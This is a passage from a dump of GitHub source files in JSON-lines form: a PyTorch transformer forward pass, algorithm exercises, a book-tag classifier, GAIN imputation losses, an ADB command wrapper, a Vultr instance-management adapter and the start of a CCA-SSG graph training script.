0)\n pos_seq += seq_shift\n\n if self.args.real_pos:\n if cache_info is None:\n pos = torch.arange(indices.size(0) - 1, -1, -1, \n dtype=torch.float,\n device=inputs.device)\n pos = pos.expand(batch_size, -1)\n pos.transpose_(0, 1)\n pos_key = pos \n else:\n pos_key = cache_info[:,:,0]\n pos_start = torch.einsum(\"ib,j->bij\", pos_key, \n pos_key.new_ones(cache_L) * cache_L)\n if self.args.farnear:\n pos_start += nei_len\n pos_seq = pos_start + torch.arange(cache_L - 1, -1, -1, \n dtype=pos_key.dtype, \n device=pos_key.device)\n pos_seq = pos_seq.reshape(batch_size, -1)\n if self.args.farnear:\n pos_tail = torch.arange(seq_len + nei_len - 1, -1, -1,\n dtype=pos_key.dtype,\n device=pos_key.device)\n else:\n pos_tail = torch.arange(seq_len - 1, -1, -1,\n dtype=pos_key.dtype,\n device=pos_key.device)\n pos_tail = pos_tail.expand(batch_size, -1)\n pos_seq = torch.cat((pos_seq, pos_tail), dim=1)\n else:\n pos_seq = pos_seq.expand(batch_size, -1)\n\n #one-hot pos_indices\n mem_num = values.size(0)\n indice_len = indices.size(0)\n tfbase = torch.eye(mem_num, device=indices.device)\n indice_bool = torch.index_select(tfbase, 0, indices.reshape(-1))\n indice_bool = indice_bool.view(indice_len, -1, batch_size, mem_num)\n indice_bool = indice_bool.sum(0)\n if self.args.discard_worst:\n # update recalls\n query_len = 
indice_bool.size(0)\n recall = indice_bool.sum(0).t()\n lengths, pos, recalls, queries = cache_info[:self.args.cache_N].chunk(4, dim=-1)\n recalls += recall.unsqueeze(-1)\n queries += query_len\n\n if self.args.stat:\n stat = indice_bool.sum((0, 1))\n self.select_stat += stat\n self.viz.bar(self.select_stat, win=\"select stat\")\n\n if weights is not None:\n x_len = inputs.size(0) if inf_ind is None else 1\n weights = weights.masked_fill(indice_bool.eq(0), -float(\"inf\"))\n weights = F.softmax(weights, 2) * self.args.cache_k\n \n else:\n pos_seq = torch.arange(total_len-1, -1, -1.0, device=inputs.device)\n pos_seq = pos_seq.expand(batch_size, -1)\n pos_indices = indices\n indice_bool = None\n\n pos_seq = pos_seq.view(batch_size, -1)\n\n # build mask to avoid seeing following words \n\n if indices is None:\n if self.same_length_query:\n all_ones = word_emb.new_ones(seq_len, total_len)\n simple_mask = torch.triu(all_ones, diagonal=1+nei_len)\n mask = simple_mask + torch.tril(all_ones, diagonal=-1)\n else:\n mask = torch.triu(word_emb.new_ones(seq_len, total_len), \n diagonal=1+mem_len+nei_len) \n else:\n if self.same_length:\n all_ones = word_emb.new_ones(seq_len, seq_len + nei_len)\n simple_mask = torch.triu(all_ones, diagonal=1+nei_len)\n mask = simple_mask + torch.tril(all_ones, diagonal=-1)\n mask = torch.cat((mask.new_zeros(seq_len, mem_len), mask), dim=1)\n else:\n mask = torch.triu(word_emb.new_ones(seq_len, total_len), \n diagonal=1+mem_len+nei_len) \n\n mask = mask.bool()[:,:,None]\n\n if self.args.sentence_cache:\n # edit mask according to actual length\n # compute positional embedding\n mask = mask.repeat(1, 1, batch_size)\n\n input_padding = inputs.eq(1)\n nei_padding = padding_hidden([input_padding.new_ones(1, l.int().item(), 1) \n for l in cache_info[cache_N,:,1]])\n nei_padding = nei_padding.squeeze(1).squeeze(-1).t().eq(False)\n\n if indices is None:\n # when computing query\n total_padding = torch.cat((nei_padding, input_padding), dim=0)\n # edit mask\n mask = mask.masked_fill(total_padding[None,:,:], True)\n # a word or padding can at least see itself\n self_mask = torch.diag(torch.ones(seq_len), diagonal=nei_len).to(mask)[:seq_len,:]\n mask = mask.masked_fill(self_mask[:,:,None], False)\n pass\n # no need to edit pos_seq, because there are no padding between nei and input\n else:\n # when computing attention\n cache_padding = padding_hidden([input_padding.new_ones(1, l.int().item(), 1) \n for l in cache_info[:cache_N,:,0].flatten()],\n length=cache_L,\n before=False)\n cache_padding = cache_padding.view(cache_N, batch_size, cache_L).eq(False)\n cache_padding = cache_padding.transpose(1, 2).reshape(cache_N * cache_L, batch_size)\n\n total_padding = torch.cat((cache_padding, nei_padding, input_padding), dim=0)\n # edit mask\n mask = mask.masked_fill(total_padding[None,:,:], True)\n\n # edit pos_seq\n new_pos = []\n for b in range(batch_size):\n cache_pos = torch.cat([torch.arange(cache_info[i,b,1].int().item() + x_len, \n cache_info[i,b,1].int().item() + x_len - cache_L,\n -1) \n for i in range(cache_N)])\n nei_x_pos = torch.arange(x_len + nei_len, 0, -1)\n batch_pos = torch.cat((cache_pos, nei_x_pos))\n \n new_pos.append(batch_pos.unsqueeze(0))\n\n pos_seq = torch.cat(new_pos).to(pos_seq)\n\n\n if self.args.clamp_len > 0:\n pos_seq = pos_seq.clamp(max=self.args.clamp_len)\n pos_emb = self.pos_emb(pos_seq)\n\n pos_emb = self.dropinp(pos_emb)\n core_out = self.dropinp(word_emb)\n \n memory = core_out.clone()\n if inf_ind is None:\n memories = [memory]\n else:\n memories = 
[memory[inf_ind].unsqueeze(0)]\n core_out = core_out[inf_ind].unsqueeze(0)\n\n if self.demo and weights is not None:\n demo_display = tuple(zip(indice_bool.squeeze(), weights.squeeze()))\n\n for i, layer in enumerate(self.layers):\n #zone_i = None if zones is None else zones[i]\n if indices is None:\n value_i = None\n else:\n value_i = values[:,:,:,i,:]\n\n if neighbor_mem is None:\n neighbor_mem_i = None\n else:\n neighbor_mem_i = neighbor_mem[i]\n\n if inf_blocks is None:\n block_i = None\n else:\n block_i = inf_blocks[i]\n\n if inf_ind is None:\n core_out, attn_matrix = layer(core_out, pos_emb, self.pos_bias_u, \n self.pos_bias_v, \n mask=mask, \n cache=value_i, \n indices=indice_bool, \n weights=weights,\n neighbor_mem=neighbor_mem_i,\n theta=self.theta)\n else:\n block_i[inf_ind] = core_out.squeeze(0)\n core_out, attn_matrix = layer(block_i, pos_emb, self.pos_bias_u, \n self.pos_bias_v, \n mask=mask, \n cache=value_i, \n indices=indice_bool, \n weights=weights,\n neighbor_mem=neighbor_mem_i,\n inf_ind=inf_ind,\n theta=self.theta)\n\n\n if i < len(self.layers) - 1:\n core_out = self.drophid(core_out)\n else:\n core_out = self.dropout(core_out)\n memories.append(core_out)\n\n memories = torch.cat(memories, 0)\n memories = memories.view(self.args.nlayers+1, core_out.size(0), -1, \n self.args.nhid)\n\n if draw:\n attn_map = attn_matrix\n else:\n attn_map = None\n\n if not self.args.adaptive:\n output = self.decoder(core_out)\n output = self.dropout(output)\n else:\n output = core_out\n\n if self.demo and weights is not None:\n id2w = self.corpus.vocabulary.index2word\n words = torch.cat((words.squeeze(), inputs.t()), 0)\n for idis, (ind, weight) in enumerate(demo_display):\n print(\"-\" * 89 + \"\\n\")\n print(\"Current Segment: \", end=\"\")\n for iinp, wd in enumerate(inputs):\n if idis == iinp:\n print(\"\\033[1;32m %s \\033[0m\" % id2w[wd.item()], end=\" \")\n else:\n print(id2w[wd.item()], end=\" \")\n print(\"\\n\")\n for i, wt in enumerate(ind * weight):\n if i + 1 == len(weight):\n continue\n print(\"SEGMENT %s | weight: %.3f\" % (i, wt.item()))\n for wd in words[i].view(-1):\n print(id2w[wd.item()], end=\" \")\n print(\"\\n\")\n return output, memories, (attn_map, demo_display)\n\n\n return output, memories, attn_map\n","repo_name":"xyz961014/longterm","sub_path":"CRTN/layers/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":37880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27220534379","text":"# 692(배열이 문자열로 되어있고 리턴하는 배열값 소팅필요) \n# 347(배열이 정수, 소팅 없음)\n# 문제: 주어진 list 에서 가장 많은 k개의 element를 구하여라.\n\n\n# 해쉬테이블과 힙 자료구조 이용함\n\nfrom typing import List\nimport heapq\n\n\ndef topKFrequent(nums: List[int], k: int) -> List[int]:\n table = {} \n for num in nums:\n count = table.get(num)\n if count is None:\n table[num] = 0 \n table[num] += 1\n \n #heap \n freq_heap = []\n for num, count in table.items():\n heapq.heappush(freq_heap,(count, num))\n if k < len(freq_heap):\n heapq.heappop(freq_heap)\n \n k_freq = []\n while freq_heap:\n count , num = freq_heap[0]\n heapq.heappop(freq_heap)\n k_freq.append(num)\n k_freq.reverse()\n \n return k_freq\n\ntopKFrequent(nums=[1,1,1,1,3,3,3,5,5,2,2,4,6], k=2)\n\n\n\n\n################################################################################\n\n\n\n\n\ndef topKfrequents(nums: List[int], k: int) -> List[int]:\n \n hashTable = {}\n for num in nums: # 해쉬에 각 수의 갯수 넣어주고\n if hashTable.get(num) is None:\n hashTable[num] = 0\n\n hashTable[num] += 1\n\n heap 
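# --- Hedged aside (annotation): for the example input above, the same top-k
# result falls out of collections.Counter without a hand-rolled heap.
from collections import Counter
nums = [1, 1, 1, 1, 3, 3, 3, 5, 5, 2, 2, 4, 6]
print([n for n, _ in Counter(nums).most_common(2)])  # [1, 3]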
= []\n for num, count in hashTable.items(): # 힙큐는 원소가 들어가서 오름차순으로 정렬됨, 즉 최소힙임\n heapq.heappush(heap, (count, num))\n \n while k < len(heap):\n heapq.heappop(heap) # 가장 많은 k개의 element를 구하면 되기에, k = len(heap)일때 멈춤, 즉 최소값이 팝되니까 남은 거는 k개만 남음\n\n results = []\n while heap: # 해당 수만 새로 배열 만들고 역순으로 정렬해서 리턴, 정렬은 문제가 요구하면 하면 됨\n count, number = heapq.heappop(heap)\n results.append(number)\n\n results.reverse()\n return results\n\ntopKfrequents(nums=[1,1,1,1,3,3,3,5,5,2,2,4,6], k=2)","repo_name":"badoil/algorithms","sub_path":"algo5.hash/hash2.topKfrequent.py","file_name":"hash2.topKfrequent.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69841341051","text":"literature = {'小说', '外国文学', '文学', '随笔', '中国文学', '经典', '日本文学', '散文', '村上春树', '童话', '诗歌', '杂文', '王小波', '儿童文学', '古典文学',\n '张爱玲', '余华', '名著', '当代文学', '钱钟书', '鲁迅', '外国名著', '诗词', '茨威格', '米兰', '昆德拉', '杜拉斯', '港台'}\n\npopular = {'漫画', '绘本', '推理', '青春', '言情', '科幻', '东野圭吾', '悬疑', '武侠', '奇幻', '韩寒', '日本漫画', '耽美', '亦舒', '三毛', '安妮宝贝', '网络小说',\n '推理小说', '郭敬明', '穿越', '金庸', '轻小说', '阿加莎', '克里斯蒂', '几米', '张小娴', '魔幻', '几米', '青春文学', '科幻小说', '罗琳', '高木直子', '古龙',\n '沧月', '落落', '张悦然', '蔡康永'}\n\nculture = {'历史', '心理学', '哲学', '传记', '文化', '社会学', '艺术', '设计', '政治', '社会', '建筑', '宗教', '电影', '数学', '政治学', '回忆录', '思想',\n '中国历史', '国学', '音乐', '人文', '戏剧', '人物传记', '绘画', '艺术史', '佛教', '军事', '西方哲学', '近代史', '二战', '考古', '自由主义', '美术'}\n\nlife = {'爱情', '旅行', '生活', '成长', '励志', '心理', '摄影', '女性', '职场', '美食', '教育', '游记', '灵修', '健康', '情感', '手工', '养生', '两性',\n '人际关系', '家居', '自助游'}\n\neconomics = {'经济学', '管理', '经济', '金融', '商业', '投资', '营销', '创业', '理财', '广告', '股票', '企业史', '策划'}\n\ntechnology = {'科普', '互联网', '编程', '科学', '交互设计', '用户体验', '算法', '科技', '通信', '交互', '神经网络', '程序'}\n\nlearning = {'学习', '英语', '词汇', '教材', '工具书', '算法', '编程'}\n\nCATEGORIES = {1: literature, 2: popular, 3: culture, 4: life, 5: economics, 6: technology, 7: learning}\n\n\ndef parse_category(tags):\n '''\n\n :param tags:\n :return: a list of ref\n '''\n ret = []\n\n for tag in tags:\n for category_id in CATEGORIES:\n if tag['name'] in CATEGORIES[category_id] and category_id not in ret:\n ret.append(category_id)\n return ret\n\nif __name__ == '__main__':\n data = '''\n\n科普(390504)\t互联网(179122)\t编程(120109)\t科学(88335)\n交互设计(57037)\t用户体验(45272)\t算法(39518)\tweb(19680)\n科技(14229)\tUE(4433)\t通信(4009)\t交互(3857)\nUCD(3407)\t神经网络(1691)\t程序(1093)\n '''\n\n import re\n\n items = re.findall(r\"([\\u4e00-\\u9fa5]+)\", data)\n print(items)\n\n tags =[\n {\n \"count\": 21,\n \"name\": \"工具书\",\n \"title\": \"工具书\"\n },\n {\n \"count\": 17,\n \"name\": \"英语\",\n \"title\": \"英语\"\n },\n {\n \"count\": 11,\n \"name\": \"图解\",\n \"title\": \"图解\"\n },\n {\n \"count\": 10,\n \"name\": \"英语学习\",\n \"title\": \"英语学习\"\n },\n {\n \"count\": 8,\n \"name\": \"英语词典\",\n \"title\": \"英语词典\"\n },\n {\n \"count\": 4,\n \"name\": \"词典\",\n \"title\": \"词典\"\n },\n {\n \"count\": 4,\n \"name\": \"牛津\",\n \"title\": \"牛津\"\n },\n {\n \"count\": 3,\n \"name\": \"英国\",\n \"title\": \"英国\"\n }\n ]\n type(CATEGORIES)\n print(parse_category(tags))\n","repo_name":"HermanZeng/dodo","sub_path":"dodo/util/douban/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"40053346092","text":"\"\"\"\nDESCRIPTION: Generative Adversarial Imputation Networks (GAIN) losses.\nAUTHOR: Pablo Ferri\nDATE: 20/08/2023\n\"\"\"\n\n# MODULES IMPORT\nfrom 
torch import Tensor, mean, log\n\n# SETTINGS\nalpha = 10\noffset = 1e-8\n\n\n# DISCRIMINATOR LOSS\ndef loss_discriminator(*, real_imputed_probabilities: Tensor, missing_mask: Tensor):\n # Loss calculation\n loss_discriminator_ = -mean(missing_mask * log(real_imputed_probabilities + offset) + (1 - missing_mask) * log(\n 1. - real_imputed_probabilities + offset))\n\n # Output\n return loss_discriminator_\n\n\n# GENERATOR LOSS\ndef loss_generator(*, features_noise_perturbed: Tensor, missing_mask, features_generated: Tensor,\n real_imputed_probabilities: Tensor):\n # Loss calculation\n # classification loss\n loss_generator_classification = -mean((1 - missing_mask) * log(real_imputed_probabilities + offset))\n # reconstruction loss\n loss_generator_reconstruction = mean(\n (features_noise_perturbed * missing_mask - features_generated * missing_mask) ** 2) / mean(missing_mask)\n # combination\n loss_generator_ = loss_generator_classification + alpha * loss_generator_reconstruction\n\n # Output\n return loss_generator_, loss_generator_classification, loss_generator_reconstruction\n","repo_name":"bdslab-upv/extremiss","sub_path":"Imputation/GAIN/lossesgain.py","file_name":"lossesgain.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"10150501784","text":"import sys\n\nsys.path.append(\"../\")\nimport subprocess\nfrom builtins import *\n\nfrom performancetest.core.global_data import logger\n\n\ndef split_cmd(cmds):\n return cmds.split() if isinstance(cmds, str) else list(cmds)\n\n\ndef proc_communicate_timeout(proc, timeout):\n try:\n stdout, stderr = proc.communicate(timeout=timeout)\n except subprocess.TimeoutExpired as e:\n proc.kill()\n stdout, stderr = proc.communicate()\n exp = Exception(\"Command {cmd} timed out after {timeout} seconds: stdout['{stdout}'], \"\n \"stderr['{stderr}']\".format(cmd=proc.args, timeout=e.timeout,\n stdout=stdout, stderr=stderr))\n raise (exp)\n\n return stdout, stderr\n\n\nclass ADB(object):\n def __init__(self, serialno=None, adb_path=None, server_addr=None):\n self.serialno = serialno\n self.adb_path = adb_path or \"adb\"\n self._set_cmd_options(server_addr)\n self.server_addr = server_addr\n\n def _set_cmd_options(self, server_addr=None):\n logger.info(server_addr)\n self.host = server_addr[0] if server_addr[0] else \"127.0.0.1\"\n self.port = server_addr[1] if server_addr[1] else 5037\n self.cmd_options = [self.adb_path]\n if self.host:\n self.cmd_options += ['-H', self.host]\n if self.port:\n self.cmd_options += ['-P', str(self.port)]\n\n def start_shell(self, cmds):\n \"\"\"\n Handle `adb shell` c(s)\n\n Args:\n cmds: adb shell command(s)\n\n Returns:\n None\n\n \"\"\"\n cmds = ['shell'] + split_cmd(cmds)\n return self.start_cmd(cmds)\n\n def start_cmd(self, cmds, device=True, only_args=False):\n \"\"\"\n Start a subprocess with adb command(s)\n\n Args:\n cmds: command(s) to be run\n device: if True, the device serial number must be specified by `-s serialno` argument\n\n Raises:\n RuntimeError: if `device` is True and serialno is not specified\n\n Returns:\n a subprocess\n\n \"\"\"\n if device:\n if not self.serialno:\n raise RuntimeError(\"please set serialno first\")\n cmd_options = self.cmd_options + ['-s', self.serialno]\n else:\n cmd_options = self.cmd_options\n\n cmds = cmd_options + split_cmd(cmds)\n logger.debug(cmds)\n logger.debug(\" \".join(cmds))\n if only_args:\n return cmds\n proc = subprocess.Popen(\n cmds,\n stdin=subprocess.PIPE,\n 
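# --- Hedged smoke test (annotation) for the GAIN discriminator loss defined
# above: random probabilities and masks only confirm the formula runs and
# stays finite; the tensors carry no real meaning.
import torch
p = torch.rand(8, 4).clamp(1e-4, 1 - 1e-4)   # "real/imputed" probabilities
m = torch.randint(0, 2, (8, 4)).float()      # 1 = observed, 0 = missing
offset = 1e-8
d_loss = -torch.mean(m * torch.log(p + offset)
                     + (1 - m) * torch.log(1.0 - p + offset))
print(float(d_loss))                          # finite and non-negative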
stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n creationflags=0\n )\n return proc\n\n def raw_shell(self, cmds, ensure_unicode=True):\n cmds = ['shell'] + split_cmd(cmds)\n logger.info(\"shell执行命令:{}\".format(str(cmds)))\n out = self.cmd(cmds, ensure_unicode=False)\n return out\n\n def cmd(self, cmds, device=True, ensure_unicode=True, timeout=None):\n proc = self.start_cmd(cmds, device)\n if timeout:\n stdout, stderr = proc_communicate_timeout(proc, timeout)\n else:\n stdout, stderr = proc.communicate()\n logger.error(f\"err msg {stderr}\")\n return stdout\n\n def killpid(self, pid):\n logger.info(\"进入killpid函数\")\n self.raw_shell(\"kill {}\".format(pid))\n logger.info(\"killpid函数执行结束\")\n\n\n# class Tidevice():\n# def __init__(self, serialno=None, tidevice_path=None, device_addr=None):\n# self.serialno = serialno\n# self.tidevice_path = tidevice_path or \"tidevice\"\n# self._set_cmd_options()\n# self.device_addr = device_addr\n# self.mac_ssh = None\n# if platform.system() != \"Darwin\":\n# # 建立ssh连接\n# trans = paramiko.Transport((IOSHOST, IOSPORT))\n# trans.connect(username=IOSUSERNAME, password=IOSPASSWORD)\n# # 将sshclient的对象的transport指定为以上的trans\n# ssh = paramiko.SSHClient()\n# ssh._transport = trans\n# self.mac_ssh = ssh\n# # # 执行命令,和传统方法一样\n# # stdin, stdout, stderr = ssh.exec_command(IOSPYTHON + \" -m tidevice\")\n# # print(stdout.read().decode())\n# # print(stderr.read().decode())\n#\n# def _set_cmd_options(self):\n# if len(self.tidevice_path.split()) > 2:\n# self.cmd_options = self.tidevice_path.split()\n# else:\n# self.cmd_options = [self.tidevice_path]\n#\n# def start_cmd(self, cmds, device=True, only_args=False):\n# \"\"\"\n# Start a subprocess with adb command(s)\n#\n# Args:\n# cmds: command(s) to be run\n# device: if True, the device serial number must be specified by `-s serialno` argument\n#\n# Raises:\n# RuntimeError: if `device` is True and serialno is not specified\n#\n# Returns:\n# a subprocess\n#\n# \"\"\"\n# if device:\n# if not self.serialno:\n# raise RuntimeError(\"please set serialno first\")\n# cmd_options = self.cmd_options + ['-u', self.serialno]\n# else:\n# cmd_options = self.cmd_options\n#\n# cmds = cmd_options + split_cmd(cmds)\n# logger.debug(\"ios cmds:{0}\".format(cmds))\n# logger.debug(\" \".join(cmds))\n# if only_args:\n# return cmds\n# proc = subprocess.Popen(\n# cmds,\n# stdin=subprocess.PIPE,\n# stdout=subprocess.PIPE,\n# stderr=subprocess.PIPE,\n# creationflags=0\n# )\n# return proc\n#\n# def raw_shell(self, cmds, ensure_unicode=True):\n# cmds = split_cmd(cmds)\n# out = self.cmd(cmds, ensure_unicode=False)\n# return out\n#\n# def cmd(self, cmds, device=True, ensure_unicode=True, timeout=None, is_block=True):\n# if platform.system() != \"Darwin\":\n# res_cmd = self.start_cmd(cmds, device, only_args=True)\n# res_cmd = \" \".join(res_cmd)\n# logger.info(\"!ios-cmd: \" + res_cmd)\n# if timeout:\n# stdin, stdout, stderr = self.mac_ssh.exec_command(res_cmd, timeout=timeout)\n# else:\n# stdin, stdout, stderr = self.mac_ssh.exec_command(res_cmd)\n# if is_block:\n# logger.error(f\"ios err msg {stderr.read()}\")\n# return stdout.read()\n# else:\n# return stdout\n# else:\n# proc = self.start_cmd(cmds, device)\n# if timeout:\n# stdout, stderr = proc_communicate_timeout(proc, timeout)\n# else:\n# stdout, stderr = proc.communicate()\n# logger.error(f\"err msg {stderr}\")\n# return stdout\n#\n# def killpid(self, pid):\n# self.raw_shell(\"kill {}\".format(pid))\n#\n# def __del__(self):\n# try:\n# logging.info(\"start close macssh\")\n# self.mac_ssh.close()\n# 
except Exception as e:\n# logger.error(e)\n\n\nif __name__ == '__main__':\n # device = Tidevice(serialno=\"00008110-0002398A36B8801E\", device_addr=\"http://10.130.131.82:20020?mjpeg_port=20019\",\n # tidevice_path=\"/Users/pirate/opt/anaconda3/bin/python -m tidevice\")\n # stdout = device.cmd(\"applist\")\n # print(\"sdfs\", stdout.decode())\n pass\n","repo_name":"Hanlen520/app_performance-1","sub_path":"performancetest/core/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":7468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"74616894651","text":"import base64\nimport os\nfrom dataclasses import asdict\nfrom typing import List, Optional\n\nimport requests\nfrom scalr.cloud import CloudAdapter, GenericCloudInstance\nfrom scalr.log import log\n\nVULTR_API_KEY: str = str(os.getenv(\"VULTR_API_KEY\"))\n\n\nclass Vultr:\n\n VULTR_API_URL: str = \"https://api.vultr.com/v2\"\n\n def __init__(self, api_key: str) -> None:\n self.api_key = api_key\n\n def query_api(\n self,\n method: str,\n path: str,\n params: Optional[dict] = None,\n json: Optional[dict] = None,\n ) -> requests.Response:\n r = requests.request(\n method=method,\n url=f\"{self.VULTR_API_URL}/{path}\",\n headers={\n \"Authorization\": f\"Bearer {self.api_key}\",\n \"Content-Type\": \"application/json\",\n },\n params=params,\n json=json,\n timeout=10,\n )\n r.raise_for_status()\n return r\n\n def list_instances(self, tag=None, label=None) -> List[dict]:\n params = {\n \"tag\": tag,\n \"label\": label,\n }\n r = self.query_api(\"get\", \"instances\", params=params)\n return r.json().get(\"instances\", dict())\n\n def start_instance(self, instance_id: str) -> None:\n self.query_api(\"post\", f\"instances/{instance_id}/start\")\n\n def delete_instance(self, instance_id: str) -> None:\n self.query_api(\"delete\", f\"instances/{instance_id}\")\n\n def create_instance(\n self,\n region,\n plan,\n os_id: Optional[str] = None,\n script_id: Optional[str] = None,\n iso_id: Optional[str] = None,\n snapshot_id: Optional[str] = None,\n enable_ipv6: Optional[bool] = None,\n attach_private_network: Optional[List[str]] = None,\n label: Optional[str] = None,\n sshkey_id: Optional[List[str]] = None,\n backups: Optional[str] = None,\n app_id: Optional[str] = None,\n image_id: Optional[str] = None,\n user_data: Optional[str] = None,\n ddos_protection: Optional[bool] = None,\n activation_email: Optional[bool] = None,\n hostname: Optional[str] = None,\n tag: Optional[str] = None,\n firewall_group_id: Optional[str] = None,\n enable_private_network: Optional[bool] = None,\n ) -> dict:\n\n if user_data:\n user_data = base64.b64encode(user_data.encode(\"utf-8\")).decode(\"utf-8\")\n\n json = {\n \"region\": region,\n \"plan\": plan,\n \"os_id\": os_id,\n \"script_id\": script_id,\n \"iso_id\": iso_id,\n \"snapshot_id\": snapshot_id,\n \"enable_ipv6\": enable_ipv6,\n \"attach_private_network\": attach_private_network,\n \"label\": label,\n \"sshkey_id\": sshkey_id,\n \"backups\": backups,\n \"app_id\": app_id,\n \"image_id\": image_id,\n \"user_data\": user_data,\n \"ddos_protection\": ddos_protection,\n \"activation_email\": activation_email,\n \"hostname\": hostname,\n \"tag\": tag,\n \"firewall_group_id\": firewall_group_id,\n \"enable_private_network\": enable_private_network,\n }\n r = self.query_api(\"post\", \"instances\", json=json)\n return r.json().get(\"instance\", dict())\n\n\nclass VultrCloudAdapter(CloudAdapter):\n def __init__(self):\n super().__init__()\n 
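# --- Hedged usage sketch (annotation) for the ADB wrapper above. The serial
# number and server address are placeholders; running this needs an adb
# binary and an attached device, so the calls stay commented out.
# adb = ADB(serialno="emulator-5554", server_addr=("127.0.0.1", 5037))
# print(adb.raw_shell("getprop ro.product.model"))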
self.vultr = Vultr(api_key=str(os.getenv(\"VULTR_API_KEY\")))\n\n def get_current_instances(self) -> List[GenericCloudInstance]:\n filter_tag = f\"scalr={self.filter}\"\n log.info(f\"vultr: Querying with filter_tag: {filter_tag}\")\n servers = self.vultr.list_instances(tag=filter_tag)\n return [\n GenericCloudInstance(\n id=server[\"id\"],\n name=server[\"label\"],\n status=server[\"power_status\"],\n )\n for server in sorted(servers, key=lambda i: i[\"date_created\"])\n ]\n\n def ensure_instances_running(self) -> None:\n log.info(\"vultr: ensure running\")\n\n for instance in self.get_current_instances():\n log.info(f\"vultr: instance {instance.name} status {instance.status}\")\n if instance.status == \"running\":\n continue\n\n if instance.status == \"stopped\":\n try:\n self.vultr.start_instance(instance_id=instance.id)\n log.info(f\"vultr: Instance {instance.name} started\")\n except Exception as ex:\n log.error(ex)\n\n def deploy_instance(self, name: str) -> None:\n log.info(f\"vultr: Deploying new instance named {name}\")\n launch_config = self.launch.copy()\n launch_config.update(\n {\n \"label\": name,\n \"hostname\": name,\n \"tag\": f\"scalr={self.filter}\",\n }\n )\n self.vultr.create_instance(**launch_config)\n\n def destroy_instance(self, instance: GenericCloudInstance) -> None:\n log.info(f\"vultr: Destroying instance {instance}\")\n self.vultr.delete_instance(instance_id=instance.id)\n","repo_name":"ngine-io/scalr","sub_path":"scalr/cloud/adapters/vultr.py","file_name":"vultr.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"78"} +{"seq_id":"10317725766","text":"'''\n142. Linked List Cycle II\n\nDeepin of 141\n\nFellow\n\n\n'''\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n\n dict = {}\n if None == head:\n return None\n\n cur = head\n dict[cur] = 1\n\n while True:\n if None == cur.next:\n return None\n\n cur = cur.next\n\n try:\n if 1 == dict[cur]:\n return cur\n except KeyError:\n dict[cur] = 1\n\nl1 = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\n\nl1.next = l2\n\n\n\nc = Solution()\nd = c.detectCycle(l1)\nprint(d.val)","repo_name":"ShuaiWang0410/LeetCode-2nd-Stage","sub_path":"LeetCode-Stage2/Linked_List/Problem_142.py","file_name":"Problem_142.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35834847811","text":"import argparse\n\nfrom model import CCA_SSG, LogReg\nfrom aug import random_aug\nfrom dataset import load\n\nimport numpy as np\nimport torch as th\nimport torch.nn as nn\n\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\nparser = argparse.ArgumentParser(description='CCA-SSG')\n\nparser.add_argument('--dataname', type=str, default='cora', help='Name of dataset.')\nparser.add_argument('--gpu', type=int, default=0, help='GPU index.')\nparser.add_argument('--epochs', type=int, default=100, help='Training epochs.')\nparser.add_argument('--lr1', type=float, default=1e-3, help='Learning rate of CCA-SSG.')\nparser.add_argument('--lr2', type=float, default=1e-2, help='Learning rate of linear evaluator.')\nparser.add_argument('--wd1', type=float, default=0, help='Weight decay of CCA-SSG.')\nparser.add_argument('--wd2', type=float, default=1e-4, 
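# --- Hedged alternative (annotation) to the dict-based detectCycle above:
# Floyd's tortoise-and-hare finds the cycle entry with O(1) extra space,
# reusing the same ListNode shape defined in that record.
def detect_cycle_floyd(head):
    slow = fast = head
    while fast and fast.next:
        slow, fast = slow.next, fast.next.next
        if slow is fast:                 # pointers met inside the cycle
            slow = head
            while slow is not fast:      # advance both one step to the entry
                slow, fast = slow.next, fast.next
            return slow
    return None                          # no cycle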
help='Weight decay of linear evaluator.')\n\nparser.add_argument('--lambd', type=float, default=1e-3, help='trade-off ratio.')\nparser.add_argument('--n_layers', type=int, default=2, help='Number of GNN layers')\n\nparser.add_argument('--use_mlp', action='store_true', default=False, help='Use MLP instead of GNN')\n\nparser.add_argument('--der', type=float, default=0.2, help='Drop edge ratio.')\nparser.add_argument('--dfr', type=float, default=0.2, help='Drop feature ratio.')\n\nparser.add_argument(\"--hid_dim\", type=int, default=512, help='Hidden layer dim.')\nparser.add_argument(\"--out_dim\", type=int, default=512, help='Output layer dim.')\n\nargs = parser.parse_args()\n\n# check cuda\nif args.gpu != -1 and th.cuda.is_available():\n args.device = 'cuda:{}'.format(args.gpu)\nelse:\n args.device = 'cpu'\n\nif __name__ == '__main__':\n\n print(args)\n graph, feat, labels, num_class, train_idx, val_idx, test_idx = load(args.dataname)\n in_dim = feat.shape[1]\n\n model = CCA_SSG(in_dim, args.hid_dim, args.out_dim, args.n_layers, args.use_mlp)\n model = model.to(args.device)\n\n optimizer = th.optim.Adam(model.parameters(), lr=args.lr1, weight_decay=args.wd1)\n\n N = graph.number_of_nodes()\n\n for epoch in range(args.epochs):\n model.train()\n optimizer.zero_grad()\n\n graph1, feat1 = random_aug(graph, feat, args.dfr, args.der)\n graph2, feat2 = random_aug(graph, feat, args.dfr, args.der)\n\n graph1 = graph1.add_self_loop()\n graph2 = graph2.add_self_loop()\n\n graph1 = graph1.to(args.device)\n graph2 = graph2.to(args.device)\n\n feat1 = 